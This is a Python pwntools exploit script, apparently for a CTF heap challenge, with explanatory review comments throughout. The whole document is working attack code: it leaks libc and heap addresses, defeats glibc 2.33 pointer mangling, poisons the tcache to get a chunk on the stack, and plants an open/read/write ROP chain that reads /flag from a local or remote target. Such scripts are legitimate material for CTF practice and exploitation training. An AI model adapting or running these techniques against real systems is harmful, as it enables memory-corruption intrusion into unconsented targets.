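from pwn import *
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys

# NOTE(review): ctypes, libcfind, LibcSearcher and base64 are not referenced
# anywhere in this script; they are kept so the namespace does not change.

# Target is a 64-bit Linux binary.  'debug' logging echoes every byte sent and
# received, which is what you want while lining up heap/stack offsets, but it
# also prints every leaked address to the terminal -- lower it once stable.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

# 1 = attack the local './pwn' process, 0 = attack the remote CTF instance.
debug = 1

# Only the tube differs between the two modes; the binary is parsed either way,
# so the ELF load is done once instead of being duplicated in each branch.
if debug:
    p = process('./pwn')
else:
    p = remote('node4.anna.nssctf.cn', 28531)
elf = ELF('./pwn')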
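# Thin wrappers over the pwntools tube `p` so the exploit body reads as a list
# of menu interactions.  Every byte pattern below is a bytes literal (b'...'):
# on Python 2 that is the same str the original used, while on Python 3 a str
# '\xf7' would be UTF-8 encoded to two bytes and never match the stream, and
# str.ljust on a bytes object raises TypeError.
def s(data):
    """Send data raw, without a trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait until text has been received, then send data."""
    return p.sendafter(text, data)


def sl(data):
    """Send data followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until text has been received, then send data plus a newline."""
    return p.sendlineafter(text, data)


def r(num=4096):
    """Receive up to num bytes; may return fewer than requested."""
    return p.recv(num)


def rl(text):
    """Receive everything up to and including text."""
    return p.recvuntil(text)


def pr(num=4096):
    """Dump up to num received bytes to stdout.

    Writes through sys.stdout.buffer when it exists (Python 3) so raw bytes
    are not rejected by the text layer; falls back to sys.stdout on Python 2.
    """
    out = getattr(sys.stdout, 'buffer', sys.stdout)
    return out.write(p.recv(num))


def inter():
    """Hand the tube over to the user."""
    return p.interactive()


def l32():
    """Read until a 0xf7 byte (top byte of a typical i386 libc pointer) and
    unpack the last 4 bytes received as a little-endian u32."""
    return u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))


def l64():
    """Read until a 0x7f byte (top byte of a typical amd64 libc/stack pointer)
    and unpack the last 6 bytes received, zero-extended to 8, as a u64."""
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def uu32():
    """Unpack the next 4 bytes as a little-endian u32.

    A short recv() is zero-padded rather than retried, so a partial read
    silently yields a wrong value -- check the logged address.
    """
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Unpack the next 6 bytes, zero-extended to 8, as a little-endian u64.

    Same short-read caveat as uu32(): padding hides a partial read.
    """
    return u64(p.recv(6).ljust(8, b'\x00'))


def int16(data):
    """Parse a hexadecimal string (with or without a 0x prefix) into an int."""
    return int(data, 16)


def lg(s, num):
    """Log a named address in hex through pwntools' success() channel."""
    return p.success('%s -> 0x%x' % (s, num))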
# libc shipped with the challenge; all symbol offsets below are looked up here.
libc = ELF('./libc-2.33.so')


def _choose(option):
    """Answer the main "Choice: " prompt with one menu option number."""
    rl("Choice: ")
    sl(str(option))


def _answer(prompt, value):
    """Wait for a field prompt and send value followed by a newline."""
    rl(prompt)
    sl(value)


def add():
    """Menu 1: allocate a chunk.  Takes no arguments -- whatever size the
    binary uses is fixed on its side and not visible from this script."""
    _choose(1)


def show(index):
    """Menu 3: print the contents of chunk `index`."""
    _choose(3)
    _answer("Idx: ", str(index))


def edit(index, size, content):
    """Menu 4: overwrite chunk `index` with `content`, announcing `size` first.

    `content` goes out through sendline, so a newline follows it on the wire.
    """
    _choose(4)
    _answer("Idx: ", str(index))
    _answer("Size: ", str(size))
    _answer("Content: ", content)


def delete(index):
    """Menu 2: free chunk `index`."""
    _choose(2)
    _answer("Idx: ", str(index))
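# ---- Stage 1: fill the tcache and leak libc ---------------------------------
# Ten allocations, then free indices 8..0 in that order.  With a 7-entry
# tcache bin, chunks 8..2 end up in tcache and chunks 1 and 0 go elsewhere;
# chunk 0 is the last one freed and is the one we leak from.
for i in range(10):
    add()
for i in range(8, -1, -1):
    delete(i)

# The constants below imply the real pointer in chunk 0 ends in a 0x00 byte
# (leak - 0x61 == libc_base + 0x1e0c00), which would stop a string print.
# Overwriting that low byte with 'a' (0x61) makes the whole pointer printable;
# 0x61 is subtracted back out afterwards.  0x1e0ba0 + 0x60 is specific to the
# provided libc-2.33.so build (presumably an arena bin pointer, 0x60 in).
edit(0, 0x1, b'a')
show(0)
rl(b"\x0a")
libc_leak = uu64() - 0x61
lg("libc_leak", libc_leak)
libc_base = libc_leak - 0x1e0ba0 - 0x60
lg("libc_base", libc_base)
environ = libc_base + libc.sym['_environ']
lg("environ", environ)

# ---- Stage 2: recover the pointer-mangling key and the heap base ------------
# Restore chunk 0's low byte, then read the first word of chunk 8.  glibc 2.32+
# stores a tcache 'next' field as (slot_address >> 12) ^ next; chunk 8 was the
# first chunk freed into tcache so its next is NULL and the stored word is just
# slot_address >> 12 -- usable directly as the XOR key for later poisoning.
edit(0, 0x1, b'\x00')
show(8)
rl(b"\x0a")
# 5 bytes: a 0x55..../0x56.... heap address shifted right by 12.  A short
# recv() here is zero-padded, not retried.
heap_key = u64(p.recv(5).ljust(8, b'\x00'))
lg("heap_key", heap_key)
heap_base = heap_key << 12
lg("heap_base", heap_base)

# ---- Stage 3: tcache poisoning to read _environ (stack leak) -----------------
# Chunk 2 is the tcache head.  Point its mangled next at _environ: the first
# add() hands back chunk 2 (index 10), the second hands back _environ itself
# (index 11), and show(11) prints the stack pointer stored there.
# NOTE(review): reusing heap_key for chunk 2 (and chunk 5 below) assumes those
# chunks sit in the same 4 KiB page as chunk 8 -- the key is per-page.
edit(2, 0x100, p64(environ ^ heap_key))
add()
add()
show(11)
rl(b"\x0a")
stack_leak = uu64()
lg("stack_leak", stack_leak)

# ---- Stage 4: second poisoning to get a chunk on the stack -------------------
# Chunk 5 is still free in tcache.  Zero its first two words (next and the
# key word glibc uses for double-free detection) and free it again so it
# becomes the tcache head, then point its next at the stack slot 0x138 below
# the leaked environ pointer.  add() twice: index 12 is chunk 5, index 13 is
# the stack slot.
edit(5, 0x100, p64(0) * 2)
delete(5)
edit(5, 0x100, p64((stack_leak - 0x138) ^ heap_key))
add()
add()

# ---- Stage 5: open/read/write ROP chain on the stack -------------------------
# Gadget offsets are hard-coded for this libc-2.33.so build; re-find them
# (ROPgadget/ropper) if the libc changes.
pop_rdi = libc_base + 0x0000000000028a55
pop_rdx = libc_base + 0x00000000000c7f32
pop_rsi = libc_base + 0x000000000002a4cf
# Suffixed _addr so the builtin open() is not shadowed.
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']

# Chunk 13's data starts at stack_leak - 0x138.  Two zero words of padding put
# the path at stack_leak - 0x128, which is exactly the rdi value passed to
# open() below; the chain that follows starts at stack_leak - 0x120, which is
# presumably the saved return address of the frame that runs edit() -- the
# 0x138 offset is specific to this binary.
flag_path = b'/flag\x00\x00\x00'
payload = p64(0) * 2 + flag_path
# open("/flag", 0 /* O_RDONLY */)
payload += p64(pop_rdi) + p64(stack_leak - 0x128) + p64(pop_rsi) + p64(0) + p64(open_addr)
# read(3, stack_leak, 0x50) -- assumes the new descriptor is 3 (only
# stdin/stdout/stderr open); the flag is read over the environment strings.
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(read_addr)
# write(1, stack_leak, 0x50)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(stack_leak) + p64(pop_rdx) + p64(0x50) + p64(write_addr)
edit(13, 0x100, payload)

inter()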